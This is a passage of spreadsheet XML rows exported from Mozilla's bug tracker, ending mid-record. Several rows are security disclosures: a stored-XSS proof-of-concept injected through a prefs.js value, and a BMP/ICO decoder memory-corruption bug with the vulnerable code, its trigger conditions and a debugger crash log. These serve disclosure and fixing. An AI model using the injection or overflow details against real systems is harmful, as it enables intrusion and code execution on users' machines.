      <c r="E3704" t="n">
        <v>1</v>
      </c>
      <c r="F3704" t="n">
        <v>1</v>
      </c>
      <c r="G3704" t="n">
        <v>5</v>
      </c>
      <c r="H3704" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3704" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3704" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3704" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3704" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3704" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3704" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3704" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3704" t="inlineStr">
        <is>
          <t>[logs]</t>
        </is>
      </c>
      <c r="Q3704" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3704" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3704" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3704" t="n">
        <v>1</v>
      </c>
      <c r="U3704" t="n">
        <v>0</v>
      </c>
      <c r="V3704" t="n">
        <v>10</v>
      </c>
      <c r="W3704" t="inlineStr">
        <is>
          <t>Exception: Command ['ssh', '-l', 'tbirdtry', '-i', '/home/cltbld/.ssh/trybld_dsa', '-p', '22', 'stage.mozilla.org', 'post_upload.py --tinderbox-builds-dir try-comm-central-win64 -b try-comm-central -p thunderbird-test -i 20120424160341 --revision 1437e018e2e2 --release-to-tinderbox-dated-builds /tmp/tmp.LgHsc23952 /tmp/tmp.LgHsc23952/try-comm-central-win64-bm14-try1-build1.txt.gz'] returned non-zero exit code 1:
Traceback (most recent call last):
  File "/usr/local/bin/post_upload.py", line 441, in ?
    func(options, upload_dir, files)
  File "/usr/local/bin/post_upload.py", line 185, in ReleaseToTinderboxBuilds
    ReleaseToBuildDir(TINDERBOX_BUILDS_PATH, TINDERBOX_URL_PATH, options, upload_dir, files, dated)
  File "/usr/local/bin/post_upload.py", line 180, in ReleaseToBuildDir
    CopyFileToDir(f, upload_dir, tinderboxBuildsPath)
  File "/usr/local/bin/post_upload.py", line 53, in CopyFileToDir
    os.makedirs(full_dest_dir, 0755)
  File "/usr/lib/python2.4/os.py", line 156, in makedirs
    makedirs(head, mode)
  File "/usr/lib/python2.4/os.py", line 159, in makedirs
    mkdir(name, mode)
OSError: [Errno 13] Permission denied: '/home/ftp/pub/thunderbird-test/tinderbox-builds/try-comm-central-win64'</t>
        </is>
      </c>
      <c r="X3704" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3705">
      <c r="A3705" t="n">
        <v>12493</v>
      </c>
      <c r="B3705" t="inlineStr">
        <is>
          <t>1999-08-25 16:45:42 -0700</t>
        </is>
      </c>
      <c r="C3705" t="inlineStr">
        <is>
          <t>layout does not canonicalize URIs for global history lookup (color of visited links) ( :visited :link )</t>
        </is>
      </c>
      <c r="D3705" t="inlineStr">
        <is>
          <t>2024-03-18 11:28:10 -0700</t>
        </is>
      </c>
      <c r="E3705" t="n">
        <v>1</v>
      </c>
      <c r="F3705" t="n">
        <v>1</v>
      </c>
      <c r="G3705" t="n">
        <v>3</v>
      </c>
      <c r="H3705" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3705" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3705" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K3705" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3705" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3705" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3705" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3705" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3705" t="inlineStr">
        <is>
          <t>fix in hand, suntrak-n6</t>
        </is>
      </c>
      <c r="Q3705" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3705" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3705" t="inlineStr">
        <is>
          <t>mozilla1.2alpha</t>
        </is>
      </c>
      <c r="T3705" t="n">
        <v>1</v>
      </c>
      <c r="U3705" t="n">
        <v>4</v>
      </c>
      <c r="V3705" t="n">
        <v>147</v>
      </c>
      <c r="W3705" t="inlineStr">
        <is>
          <t>Version: Apprunner
Build: 1999082412 (Aug 24th M9)
Platform: All
Expected Results: The vlink attribute should set the visited link to purple
What I got: The link remains blue.
Steps to reproduce:
1) Open http://slip/projects/marvin/html/body_vlink.html
2) Click on the link. This should load the cnn web page.
3) After the site loads, click on the back arrow.
4) The body_vlink page appears but the link remains as blue.</t>
        </is>
      </c>
      <c r="X3705" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3706">
      <c r="A3706" t="n">
        <v>602511</v>
      </c>
      <c r="B3706" t="inlineStr">
        <is>
          <t>2010-10-07 07:57:56 -0700</t>
        </is>
      </c>
      <c r="C3706" t="inlineStr">
        <is>
          <t>Show summary and keywords on review page.</t>
        </is>
      </c>
      <c r="D3706" t="inlineStr">
        <is>
          <t>2010-11-12 10:43:07 -0800</t>
        </is>
      </c>
      <c r="E3706" t="n">
        <v>1</v>
      </c>
      <c r="F3706" t="n">
        <v>1</v>
      </c>
      <c r="G3706" t="n">
        <v>5</v>
      </c>
      <c r="H3706" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3706" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3706" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K3706" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3706" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3706" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3706" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3706" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3706" t="inlineStr"/>
      <c r="Q3706" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3706" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3706" t="inlineStr">
        <is>
          <t>2.3</t>
        </is>
      </c>
      <c r="T3706" t="n">
        <v>1</v>
      </c>
      <c r="U3706" t="n">
        <v>0</v>
      </c>
      <c r="V3706" t="n">
        <v>3</v>
      </c>
      <c r="W3706" t="inlineStr">
        <is>
          <t>On the revision/translation review page, we should show the summary and keywords as they are part of the revision.</t>
        </is>
      </c>
      <c r="X3706" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3707">
      <c r="A3707" t="n">
        <v>1046743</v>
      </c>
      <c r="B3707" t="inlineStr">
        <is>
          <t>2014-07-31 06:32:45 -0700</t>
        </is>
      </c>
      <c r="C3707" t="inlineStr">
        <is>
          <t>Mochitest OOP and multi-part xpcshell jobs are missing the job part number from their symbol</t>
        </is>
      </c>
      <c r="D3707" t="inlineStr">
        <is>
          <t>2014-09-02 15:12:21 -0700</t>
        </is>
      </c>
      <c r="E3707" t="n">
        <v>1</v>
      </c>
      <c r="F3707" t="n">
        <v>1</v>
      </c>
      <c r="G3707" t="n">
        <v>7</v>
      </c>
      <c r="H3707" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3707" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3707" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3707" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3707" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3707" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3707" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3707" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3707" t="inlineStr"/>
      <c r="Q3707" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3707" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3707" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3707" t="n">
        <v>1</v>
      </c>
      <c r="U3707" t="n">
        <v>0</v>
      </c>
      <c r="V3707" t="n">
        <v>10</v>
      </c>
      <c r="W3707" t="inlineStr">
        <is>
          <t>Compare:
https://tbpl.mozilla.org/?tree=Try&amp;rev=117245a61c89
versus:
https://treeherder.mozilla.org/ui/#/jobs?repo=try&amp;revision=117245a61c89
In the TBPL version, the xpcshell jobs on Android 2.3 opt are X1, X2, X3.  On the treeherder version, they are all simply X; it is unclear whether those are distinct jobs or retriggers of the same job.</t>
        </is>
      </c>
      <c r="X3707" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3708">
      <c r="A3708" t="n">
        <v>166622</v>
      </c>
      <c r="B3708" t="inlineStr">
        <is>
          <t>2002-09-04 11:05:40 -0700</t>
        </is>
      </c>
      <c r="C3708" t="inlineStr">
        <is>
          <t>SSL cipher coverage test fails in backward compatibility testing</t>
        </is>
      </c>
      <c r="D3708" t="inlineStr">
        <is>
          <t>2002-09-06 11:50:59 -0700</t>
        </is>
      </c>
      <c r="E3708" t="n">
        <v>1</v>
      </c>
      <c r="F3708" t="n">
        <v>1</v>
      </c>
      <c r="G3708" t="n">
        <v>3</v>
      </c>
      <c r="H3708" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3708" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J3708" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K3708" t="inlineStr">
        <is>
          <t>3.6</t>
        </is>
      </c>
      <c r="L3708" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3708" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3708" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3708" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3708" t="inlineStr"/>
      <c r="Q3708" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3708" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3708" t="inlineStr">
        <is>
          <t>3.6</t>
        </is>
      </c>
      <c r="T3708" t="n">
        <v>1</v>
      </c>
      <c r="U3708" t="n">
        <v>0</v>
      </c>
      <c r="V3708" t="n">
        <v>13</v>
      </c>
      <c r="W3708" t="inlineStr">
        <is>
          <t>Today's daily build fails all SSL cipher coverage tests
in the backward compatibility testing on all platforms.
Three typical errors are:
tstclnt: write to SSL socket failed: SSL received a record with an incorrect
Message Authentication Code.
selfserv: HDX PR_Read returned error -5961:
TCP connection reset by peer.
selfserv: HDX PR_Read returned error -12273:
SSL received a record with an incorrect Message Authentication Code.
tstclnt: write to SSL socket failed: SSL peer reports incorrect Message
Authentication Code.
selfserv: HDX PR_Read returned error -12264:
SSL received a record with bad block padding.
tstclnt: write to SSL socket failed: SSL peer reports incorrect Message
Authentication Code.</t>
        </is>
      </c>
      <c r="X3708" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3709">
      <c r="A3709" t="n">
        <v>1513020</v>
      </c>
      <c r="B3709" t="inlineStr">
        <is>
          <t>2018-12-10 10:19:04 -0800</t>
        </is>
      </c>
      <c r="C3709" t="inlineStr">
        <is>
          <t>reject crashes reports with build ids &gt; 2 years</t>
        </is>
      </c>
      <c r="D3709" t="inlineStr">
        <is>
          <t>2020-06-01 07:30:30 -0700</t>
        </is>
      </c>
      <c r="E3709" t="n">
        <v>1</v>
      </c>
      <c r="F3709" t="n">
        <v>1</v>
      </c>
      <c r="G3709" t="n">
        <v>4</v>
      </c>
      <c r="H3709" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3709" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3709" t="inlineStr">
        <is>
          <t>Antenna</t>
        </is>
      </c>
      <c r="K3709" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3709" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3709" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3709" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3709" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3709" t="inlineStr"/>
      <c r="Q3709" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3709" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3709" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3709" t="n">
        <v>1</v>
      </c>
      <c r="U3709" t="n">
        <v>0</v>
      </c>
      <c r="V3709" t="n">
        <v>12</v>
      </c>
      <c r="W3709" t="inlineStr">
        <is>
          <t>Firefox 50 came out November 16th, 2016. That predates Quantum and a lot of work by a significant amount.
Firefox 52 ESR just ended support in September 2018. The current ESR is Firefox 60.
archive.mozilla.org purged candidate information for most releases prior to Firefox 50, so it was hard to assemble the version information Socorro needed to fix the version_string for incoming crashes for beta releases.
In the last month, 6.9% of incoming crashes for Firefox release channel are for versions before Firefox 50. Since Socorro only accepts 10% of incoming crashes for Firefox desktop release, 6.9% of those slots are being taken up by crashes of dubious value.
This bug covers investigating the consequences of rejecting all crashes prior to Firefox 50 and if it's fine and we get a thumbs-up from relman and other affected people, implementing it.</t>
        </is>
      </c>
      <c r="X3709" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3710">
      <c r="A3710" t="n">
        <v>1661617</v>
      </c>
      <c r="B3710" t="inlineStr">
        <is>
          <t>2020-08-27 17:58:24 -0700</t>
        </is>
      </c>
      <c r="C3710" t="inlineStr">
        <is>
          <t>Changing to &lt;input type=password&gt; to &lt;input type=text&gt; causes software keyboard type is changed to non-password style</t>
        </is>
      </c>
      <c r="D3710" t="inlineStr">
        <is>
          <t>2021-06-02 22:07:17 -0700</t>
        </is>
      </c>
      <c r="E3710" t="n">
        <v>1</v>
      </c>
      <c r="F3710" t="n">
        <v>1</v>
      </c>
      <c r="G3710" t="n">
        <v>3</v>
      </c>
      <c r="H3710" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3710" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3710" t="inlineStr">
        <is>
          <t>DOM: UI Events &amp; Focus Handling</t>
        </is>
      </c>
      <c r="K3710" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3710" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3710" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3710" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3710" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3710" t="inlineStr">
        <is>
          <t>[adv-main83+][adv-esr78.5+]</t>
        </is>
      </c>
      <c r="Q3710" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3710" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3710" t="inlineStr">
        <is>
          <t>83 Branch</t>
        </is>
      </c>
      <c r="T3710" t="n">
        <v>1</v>
      </c>
      <c r="U3710" t="n">
        <v>0</v>
      </c>
      <c r="V3710" t="n">
        <v>19</v>
      </c>
      <c r="W3710" t="inlineStr">
        <is>
          <t>This may be privacy issue, I file as sec bug at first.
Actually, software keyboard type depends on current `type` attribute of `input` element.  If type is password, we change to password layout.  So if `type` attribute is changed, keyboard layout is also changed. This is managed by `IMEStateManager` to using `type` and `inputmode`.
But although some web site has "Show password' icon not to mask password input, the following issue occurs.
### Env
Fenix with GBoard.  I guess that this occurs on Windows tablet.
### Step
1. Access to www.google.com
2. Enter google account email address.
3. Focus password field.
4. Click "Show password" icon.
### Actual Result
Keyboard layout is changed to non-password style. 
###  Actual Google Chrome Result
Even if tapping "Show password" icon, keyboard layout isn't changed.  Although I heard from Googler that they consider this situation to keep keyboard layout for password.
I think that Chrome's way is better for password field. Although most software keyboard leans input history if not password layout, "Show password" causes that software keyboard learns inputted password even if this is password field as web site.</t>
        </is>
      </c>
      <c r="X3710" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3711">
      <c r="A3711" t="n">
        <v>840098</v>
      </c>
      <c r="B3711" t="inlineStr">
        <is>
          <t>2013-02-11 08:39:47 -0800</t>
        </is>
      </c>
      <c r="C3711" t="inlineStr">
        <is>
          <t>"ASSERTION: Unexpected aDocument" after adopting content from XBL</t>
        </is>
      </c>
      <c r="D3711" t="inlineStr">
        <is>
          <t>2014-11-19 19:48:10 -0800</t>
        </is>
      </c>
      <c r="E3711" t="n">
        <v>1</v>
      </c>
      <c r="F3711" t="n">
        <v>1</v>
      </c>
      <c r="G3711" t="n">
        <v>3</v>
      </c>
      <c r="H3711" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3711" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3711" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K3711" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3711" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3711" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3711" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3711" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3711" t="inlineStr">
        <is>
          <t>[land test on 8/5][adv-main22+][adv-esr1707+]</t>
        </is>
      </c>
      <c r="Q3711" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3711" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3711" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T3711" t="n">
        <v>1</v>
      </c>
      <c r="U3711" t="n">
        <v>0</v>
      </c>
      <c r="V3711" t="n">
        <v>34</v>
      </c>
      <c r="W3711" t="inlineStr">
        <is>
          <t>Created attachment 712468
testcase
###!!! ASSERTION: Unexpected aDocument: 'aDocument == mDocument', file layout/base/nsPresShell.cpp, line 4073
###!!! ASSERTION: Should be in an update while creating frames: 'mUpdateCount != 0', file layout/base/nsCSSFrameConstructor.cpp, line 6532
And a memory leak.
(Security-sensitive because the second assertion has appeared in security bugs.)</t>
        </is>
      </c>
      <c r="X3711" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3712">
      <c r="A3712" t="n">
        <v>1430511</v>
      </c>
      <c r="B3712" t="inlineStr">
        <is>
          <t>2018-01-14 17:59:24 -0800</t>
        </is>
      </c>
      <c r="C3712" t="inlineStr">
        <is>
          <t>Stored XSS in chrome://browser/content/preferences/in-content/findInPage.js line 306</t>
        </is>
      </c>
      <c r="D3712" t="inlineStr">
        <is>
          <t>2018-08-28 22:56:39 -0700</t>
        </is>
      </c>
      <c r="E3712" t="n">
        <v>1</v>
      </c>
      <c r="F3712" t="n">
        <v>1</v>
      </c>
      <c r="G3712" t="n">
        <v>2</v>
      </c>
      <c r="H3712" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3712" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3712" t="inlineStr">
        <is>
          <t>Settings UI</t>
        </is>
      </c>
      <c r="K3712" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L3712" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3712" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3712" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3712" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3712" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main59+]</t>
        </is>
      </c>
      <c r="Q3712" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3712" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3712" t="inlineStr">
        <is>
          <t>Firefox 59</t>
        </is>
      </c>
      <c r="T3712" t="n">
        <v>1</v>
      </c>
      <c r="U3712" t="n">
        <v>0</v>
      </c>
      <c r="V3712" t="n">
        <v>12</v>
      </c>
      <c r="W3712" t="inlineStr">
        <is>
          <t>Created attachment 8942549
storexss.png
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Build ID: 20180103231032
Steps to reproduce:
Adding the following to prefs.js mozilla user profile :
user_pref("app.support.baseURL", "\"&gt;&lt;/html:a&gt;&lt;html:img src=\"nopath.nopath\" onerror=\"alert('Stored XSS');\"&gt;&lt;/html:img&gt;&lt;html:a href=\"");
Will cause an alert dialog box to popup when a user access chrome://browser/content/preferences/in-content/preferences.xul and perform a search with no results.
Since prefs.js can be modified using a low privileged process (runonce key in HKCU registry for example) and that from the JavaScript context one can access the Standard JavaScript code modules, one can turn mozilla into a persistent malware. For example, using the OS.File module it is possible to implement a ransomware.
REMARK : The dialog box do not show up when no results are returned when preferences page is loaded using the about:preferences URI.
Actual results:
With the preference app.support.baseURL set to the above value and from chrome://browser/content/preferences/in-content/preferences.xul searching for "ewwe" lead to the result shown in the attach storedxss.png
Expected results:
Value of the app.support.baseURL preference should be sanitized before being inserted into the html content at line 307 of chrome://browser/content/preferences/in-content/findInPage.js.</t>
        </is>
      </c>
      <c r="X3712" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3713">
      <c r="A3713" t="n">
        <v>775793</v>
      </c>
      <c r="B3713" t="inlineStr">
        <is>
          <t>2012-07-19 17:38:57 -0700</t>
        </is>
      </c>
      <c r="C3713" t="inlineStr">
        <is>
          <t>nsBMPDecoder alpha channel processing memory corruption</t>
        </is>
      </c>
      <c r="D3713" t="inlineStr">
        <is>
          <t>2013-04-25 17:06:47 -0700</t>
        </is>
      </c>
      <c r="E3713" t="n">
        <v>1</v>
      </c>
      <c r="F3713" t="n">
        <v>1</v>
      </c>
      <c r="G3713" t="n">
        <v>3</v>
      </c>
      <c r="H3713" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3713" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3713" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K3713" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3713" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3713" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3713" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3713" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3713" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q3713" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3713" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3713" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T3713" t="n">
        <v>1</v>
      </c>
      <c r="U3713" t="n">
        <v>0</v>
      </c>
      <c r="V3713" t="n">
        <v>31</v>
      </c>
      <c r="W3713" t="inlineStr">
        <is>
          <t>Created attachment 644090
Sample file triggering the bug
This bug is present in the nsBMPDecoder class, in the code responsible for processing alpha channel data.
It allows a remote attacker to write random memory, hence the critical severity.
User action is needed in the following form: the user needs to open a web page containing a specially crafted image.
The vulnerable code lies in nsBMPDecoder.cpp, at line 519:
510                           if (mUseAlphaData) {
511                             if (!mHaveAlphaData &amp;&amp; p[3]) {
512                               // Non-zero alpha byte detected! Clear previous
513                               // pixels that we have already processed.
514                               // This works because we know that if we 
515                               // are reaching here then the alpha data in byte 
516                               // 4 has been right all along.  And we know it
517                               // has been set to 0 the whole time, so that 
518                               // means that everything is transparent so far.
519                               memset(mImageData + (mCurLine - 1) * GetWidth(), 0, 
520                                      (GetHeight() - mCurLine + 1) * 
521                                      GetWidth() * sizeof(PRUint32));
522                               mHaveAlphaData = true;
523                             }
This code is responsible for clearing pixels in the mImageData array, when it is processing a BMP image with an alpha channel, and encounters for the first time a non-zero alpha byte.
The third parameter of memset is calculated using GetHeight(), which returns the raw "height" header value, even when it is negative (which is allowed for BMP images, it means pixels are stored top-to-bottom instead of bottom-to-top). The result of this calculation is then used as an unsigned 32 bits integer by memset.
If GetHeight() returns a negative value, the calculation will result in a very large unsigned number, and memset() will run past the mImageData array, resulting in a memory corruption, which could in turn lead to arbitrary code execution.
The code snippet above will be executed only if mUseAlphaData is true. The only way for this to happen is to have a BMP image embedded in an icon file (.ico). The nsICODecoder will instantiate a nsBMPDecoder, and call its method SetUseAlphaData with the parameter "true", which will set mUseAlphaData to true:
nsICODecoder.cpp:
434     nsBMPDecoder *bmpDecoder = new nsBMPDecoder(mImage, mObserver); 
435     mContainedDecoder = bmpDecoder;
436     bmpDecoder-&gt;SetUseAlphaData(true);
Another condition is that the BMP pixel array must be in 32 bits per pixel format (Red, Green, Blue, Alpha). This is done simply by setting the "bpp" field to 32 in the image header.
The last condition is that at least one alpha byte must be non-zero.
The attached file "bmp_with_alpha.ico" triggers the vulnerability.
Here is a WinDbg log when exploiting the vulnerability in Firefox on Windows XP:
(53c.734): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=062f0380 ebx=05c3a0d0 ecx=01ffffd8 edx=00000000 esi=05d1fdd8 edi=062f1000
eip=781472d7 esp=0012cbe8 ebp=0012cbec iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
MSVCR80!strnicmp+0x7c:
781472d7 660f7f07        movdqa  xmmword ptr [edi],xmm0 ds:0023:062f1000=????????????????????????????????
0:000&gt; k
ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be wrong.
0012cbec 78147344 MSVCR80!strnicmp+0x7c
0012cc0c 012ecf98 MSVCR80!strnicmp+0xe9
0012cc44 0119f049 xul!mozilla::imagelib::nsBMPDecoder::WriteInternal+0x1a9368
0012cca8 010de143 xul!mozilla::imagelib::nsICODecoder::FixBitmapWidth+0x13 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\image\decoders\nsicodecoder.cpp @ 208]
0012ccc8 0113410e xul!mozilla::imagelib::RasterImage::WriteToDecoder+0x3e [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\image\src\rasterimage.cpp @ 2370]
0012cce4 010b9526 xul!mozilla::imagelib::RasterImage::DecodeSomeData+0x35 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\image\src\rasterimage.cpp @ 2702]
0012cd3c 010f6ba2 xul!mozilla::imagelib::imgDecodeWorker::Run+0xfe [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\image\src\rasterimage.cpp @ 2819]
0012cd50 010f6be3 xul!mozilla::imagelib::RasterImage::AddSourceData+0xcf [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\image\src\rasterimage.cpp @ 1496]
0012cda4 0104cfb6 xul!mozilla::imagelib::RasterImage::WriteToRasterImage+0x15 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\image\src\rasterimage.cpp @ 2917]
0012cda4 0104cfb6 xul!imgRequest::OnDataAvailable+0x466 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\image\src\imgrequest.cpp @ 1166]
0012d004 010f1121 xul!imgRequest::OnDataAvailable+0x466 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\image\src\imgrequest.cpp @ 1166]
0012d024 010a7f3a xul!ProxyListener::OnDataAvailable+0x26 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\image\src\imgloader.cpp @ 2091]
0012d050 010981c3 xul!nsBaseChannel::OnDataAvailable+0x49 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\netwerk\base\src\nsbasechannel.cpp @ 774]
0012d094 0109807a xul!nsInputStreamPump::OnStateTransfer+0xd3 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\netwerk\base\src\nsinputstreampump.cpp @ 512]
0012d0a8 01097df3 xul!nsInputStreamPump::OnInputStreamReady+0x6d [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\netwerk\base\src\nsinputstreampump.cpp @ 409]
0012d0b8 00fbee5f xul!nsInputStreamReadyEvent::Run+0x1d [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\xpcom\io\nsstreamutils.cpp @ 115]
